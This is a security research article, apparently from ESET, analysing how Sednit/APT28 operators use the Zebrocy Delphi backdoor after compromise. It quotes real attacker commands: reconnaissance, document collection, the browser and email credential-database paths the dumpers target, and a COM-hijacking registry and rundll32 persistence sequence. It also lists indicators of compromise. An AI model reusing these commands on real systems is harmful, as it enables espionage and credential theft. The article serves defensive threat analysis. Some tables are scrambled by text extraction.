# A journey to Zebrocy land **[welivesecurity.com/2019/05/22/journey-zebrocy-land](https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/)** May 22, 2019 ESET sheds light on commands used by the favorite backdoor of the Sednit group [ESET Research 22 May 2019 - 11:30AM](https://www.welivesecurity.com/author/esetresearch/) What happens when a victim is compromised by a backdoor and the operator is controlling it? It’s a difficult question that is not possible to answer entirely by reverse engineering the code. In this article we will analyze commands sent by the operator to their targets. The Sednit group – also known as APT28, Fancy Bear, Sofacy or STRONTIUM – has been operating since at least 2004 and has made headlines frequently in past years. Recently, we unveiled the existence of a UEFI rootkit, called [LoJax, which we attribute to](https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/) the Sednit group. This is a first for an APT group, and shows Sednit has access to very sophisticated tools to conduct its espionage operations. Three years ago, the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia. Since then, the number and diversity of components has increased drastically. [ESET](https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/) [researchers and colleagues](https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/) from [other](https://securelist.com/masha-and-these-bears/84311/) [companies have documented these components; however, in this article we](https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/) will focus on what’s beyond the compromise, what the operators do once a victim system is running a Zebrocy Delphi backdoor. # The bear’s bait At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for [credential phishing.](https://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-full.pdf) However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign. ----- Figure 1. Statistics of the Bitly URL About 20 clicks were recorded on this link in the same week that the URL was created, and these presumably downloaded the target archive. Let’s keep in mind that this may mean fewer than 20 potential victims, as victims may have clicked on the URL twice, or maybe even more times, because the outcome was not what they expected… as we will describe below. While ESET telemetry data indicates that this URL was delivered by spearphishing emails, we don’t have a sample of such an email. The shortened URL leads the victim to an IP-address-based URL, where the archived payload is located. Unfortunately, without the email message, we don’t know if there are any instructions for the user, if there is any further social engineering, or if it relies solely on the victim’s curiosity. The archive contains two files; the first is an executable file, while the second is a decoy PDF document. Note there is a typo in the executable’s filename; it should be “ДОВIДНИК” instead of “ДОВIДНIК”. Once the binary is executed, a password prompt dialog box opens. The result of the password validation will always be wrong, but after the apparent Figure 2. Files extracted from the archive (Google Translate validation attempt, the decoy PDF suggests “CATALOGUE – (2018).exe” and “Order 97.pdf” document is opened. That from the Ukrainian) document appears to be empty, but the downloader, which is written in Delphi, continues running in the background. The IP address is also used in the URL hardcoded into the first binary downloader. # The bear’s lair ----- The Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy downloaders. Once again this downloader is as straightforward as the Zebrocy gang’s other downloaders. It creates an ID and it downloads a new, interesting backdoor, (this time) written in Delphi. As we explained in our [most recent blogpost about Zebrocy, the configuration of the](https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/) backdoor is stored in in the resource section and is split into four different hex-encoded, encrypted blobs. These blobs contain the different parts of the configuration. Once the backdoor sends basic information about its newly compromised system, the operators take control of the backdoor and start to send commands right away. Hence, the time between the victim running the downloader and the operators’ first commands is only a few minutes. Figure 3. Overview of the resource section ----- ----- # How the bear hunts In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor. The commands available are located in one of the configuration blobs mentioned earlier (the “commands” blob in Figure 3). The number of supported commands has increased over time, with the latest version of the backdoor having more than thirty. As we did not identify a pattern in the order which the commands are invoked, we believe the operators are executing them manually. The first set of commands gathers information about the victim’s computer and environment: **SCREENSHOT** **None** **SYS_INFO** **None** **GET_NETWORK** **None** **SCAN_ALL** **None** The commands above are commonly executed when the operators first connect to a newly activated backdoor. They don’t have any arguments, and they are quite selfexplanatory. Other commands commonly seen executed shortly after these backdoors are activated, listed below: **REG_GET_KEYS_‐** **VALUES** **DOWNLOAD_DAY(30)** **DOWNLOAD_DAY(1)** HKEY_CURRENT_USER Software\Microsoft\Windows\CurrentVersion c:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg; *.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz; d:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg; *.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz; c:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg *.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf; d:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg *.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf; **CMD_EXECUTE** echo %APPDATA% ipconfig /all netstat -aon **CMD_EXECUTE** wmic process get Caption,ExecutablePath reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s ----- Those who already have read our previous articles about Zebrocy will notice that more or less the same kind of information is sent, over and over again by previous stages. This information is requested within a few minutes of initial compromise and the amount of data the operator will have to deal with is quite considerable. In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims’ machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star _Browser (a Chromium-based browser), and CentBrowser are targeted, as well as_ versions of Microsoft Outlook from 1997 through 2016: **UPLOAD_AND_EXECUTE_FILE** C:\ProgramData\Office\MS\msoffice.exe […] 4D5A9000… These dumpers create log files indicating the presence or absence of potential databases to dump: **DOWNLOAD_LIST** C:\ProgramData\Office\MS\out.txt C:\ProgramData\Office\MS\text.txt The current dumper contains the following output when there are no databases to dump: %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\Default\Login Data not found %LOCALAPPDATA%\Chromium\User Data\Default\Login Data not found %LOCALAPPDATA%\7Star\7Star\User Data\Default\Login Data not found %LOCALAPPDATA%\CentBrowser\User Data\Default\Login Data not found These dumpers are quickly removed once they have done their job. Moreover, the backdoor contains a list of filenames related to credentials from software listed below (database names): key3.db Firefox private keys (now named key4.db) cert8.db Firefox certificate database logins.json Firefox encrypted password database account.cfn The Bat! (email client) account credentials wand.dat Opera password database The operators take care of retrieving these databases if they are present on the victim’s computer. %APPDATA%\The Bat!\Account.CFN **DOWNLOAD_LIST** %APPDATA%\The Bat!\[REDACTED]\Account.CFN The operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer. ----- Finally, depending on how interesting the victim is, they malware operators may deploy another custom backdoor. This backdoor is executed using the CMD_EXECUTE command: **Com‐** **mand** **Arguments** **CMD_** **EXE‐** 1 **CUTE** 2 3 reg add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-95713A95A62C36A1}" /ve /d "Reliability Maintenance Control Panel" /reg:64 /f&® add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F49571-3A95A62C36A1}\InProcServer32" /ve /d "%APPDATA%\Microsoft\WinSupport\RMC\mtrcpl.dll" /reg:64 /f&® add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-95713A95A62C36A1}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Both" /reg:64 /f rundll32.exe "%APPDATA%\Microsoft\WinSupport\RMC\mtrcpl.dll",#1 687474703A2F2F[REDACTED] dir /s /b /o:gn %APPDATA%\Microsoft\ There are some interesting facts here. First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration. The two Delphi backdoors, the common one and the one above, are quite similar but contain these interesting tweaks: **Delphi compiler version** 14.0-15.0 32.0 **32/64-bit** 32-bit 64-bit **Configuration location** resource section no config (C&C is passed as an argument) **Number of commands** 5 3 **Encryption algorithm** AES ECB custom **Lifetime on the** **computer** a few days a few hours Once again, it’s not very clear what the purpose of this custom backdoor is. The detection ratio is definitely lower in comparison to the “usual” backdoor. The very short timeframe where this backdoor is on the system and operating makes it harder to retrieve. Once its operators complete their evil deeds, they quickly remove it. # Summary ----- Observing commands used in the wild by the operator is quite interesting. They are gathering a considerable amount of information on the compromised target and they are not worried about duplicated data. It shows a large gap between the development strategy and what operators do in practice. Backdoors with custom configuration and modules are deployed very carefully, which indicates some precautions to avoid ending up in the hands of researchers. The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated? # Indicators of Compromise (IoCs) http://45.124.132[.]127/DOVIDNIK - (2018).zip http://45.124.132[.]127/action-center/centerforserviceandaction/service-and-action.php 48f8b152b86bed027b9152725505fbf4a24a39fd Win32/TrojanDownloader.Sednit.CMT 1e9f40ef81176190e1ed9a0659473b2226c53f57 Win32/HackTool.PSWDump.D bfa26857575c49abb129aac87207f03f2b062e07 Win32/PSW.Agent.OGE # MITRE ATT&CK techniques **Initial** **Access** **Execu‐** **tion** **Persis‐** **tence** **Defense** **Evasion** [T1192](https://attack.mitre.org/techniques/T1192/) Spearphishing Link [T1107](https://attack.mitre.org/techniques/T1107/) File Deletion Deletes files (binaries and files created) after usage. Spearphishing emails using a URL-shortener ser‐ vice to trick the victim into clicking on a link to a zip file containing malicious files. [T1204](https://attack.mitre.org/techniques/T1204/) User Execution Tricks users into running an executable with an icon that looks like a Microsoft Word document. [T1085](https://attack.mitre.org/techniques/T1085/) Rundll32 rundll32.exe has been used to run a new, down‐ loaded, malicious DLL. [T1047](https://attack.mitre.org/techniques/T1047/) Windows Man‐ agement Instrumentation WMI commands to gather victim host details. [T1053](https://attack.mitre.org/techniques/T1053/) Scheduled Task Schedule task to execute malicious binaries. [T1060](https://attack.mitre.org/techniques/T1060/) Registry Run Keys / Startup Folder [T1122](https://attack.mitre.org/techniques/T1122/) Component Ob‐ ject Model Hijacking Registry key HKCU\Software\Microsoft\Current‐ Version\Run\ used for persistence. COM hijacking for persistence. ----- [T1089](https://attack.mitre.org/techniques/T1089/) Disabling Securi‐ ty Tools Kills processes **Discov‐** **ery** **Collec‐** **tion** **Exfiltra‐** **tion** **Com‐** **mand** **And** **Control** [T1012](https://attack.mitre.org/techniques/T1012/) Query Registry Registry keys enumeration [T1041](https://attack.mitre.org/techniques/T1041/) Exfiltration Over Command and Control Channel [T1043](https://attack.mitre.org/techniques/T1043/) Commonly Used Port [T1024](https://attack.mitre.org/techniques/T1024/) Custom Crypto‐ graphic Protocol [T1057](https://attack.mitre.org/techniques/T1057/) Process Discovery [T1082](https://attack.mitre.org/techniques/T1082/) System Informa‐ tion Discovery [T1083](https://attack.mitre.org/techniques/T1083/) File and Directo‐ ry Discovery [T1005](https://attack.mitre.org/techniques/T1005/) Data from Local System [T1039](https://attack.mitre.org/techniques/T1039/) Data from Net‐ work Shared Drive [T1025](https://attack.mitre.org/techniques/T1025/) Data from Re‐ movable Media Lists running processes Uses systeminfo command to gather information about the victim. Uses echo ENV command to list the content of a directory. Scans files that match extensions listed in the malware. Enumerates remote and local drives and then ex‐ filtrates files matching specific extensions. Enumerates remote and local drives and then ex‐ filtrates files matching specific extensions. [T1074](https://attack.mitre.org/techniques/T1074/) Data Staged Creates file containing path of all files to exfiltrate. [T1056](https://attack.mitre.org/techniques/T1056/) Input Capture Keylogger feature. [T1113](https://attack.mitre.org/techniques/T1113/) Screen Capture Screenshot feature. [T1020](https://attack.mitre.org/techniques/T1020/) Automated Exfiltration Automatically prepare a file with all file paths to retrieve and send it. [T1022](https://attack.mitre.org/techniques/T1022/) Data Encrypted Data sent are hex-encoded, encrypted with a known algorithm or a custom one. Data are exfiltrated to a C&C server. Downloaders and backdoors use ports 80 or 443 to communicate with the C&C server. Data sent are hex encoded, encrypted with AES or a custom algorithm. [T1132](https://attack.mitre.org/techniques/T1132/) Data Encoding Data sent are hex-encoded, encrypted with a known algorithm or a custom one. [T1001](https://attack.mitre.org/techniques/T1001/) Data Obfuscation Data sent are hex-encoded, encrypted with a known algorithm or a custom one. [T1008](https://attack.mitre.org/techniques/T1008/) Fallback Channels [T1079](https://attack.mitre.org/techniques/T1079/) Multilayer Encryption A fallback C&C server is embedded in the configuration. Data sent are hex-encoded, encrypted with a known algorithm or a custom one. ----- [T1071](https://attack.mitre.org/techniques/T1071/) Standard Appli‐ cation Layer Protocol [T1032](https://attack.mitre.org/techniques/T1032/) Standard Crypto‐ graphic Protocol HTTP, HTTPS are used to communicate. Data sent are hex-encoded, encrypted with a known algorithm or a custom one. [ESET Research 22 May 2019 - 11:30AM](https://www.welivesecurity.com/author/esetresearch/) -----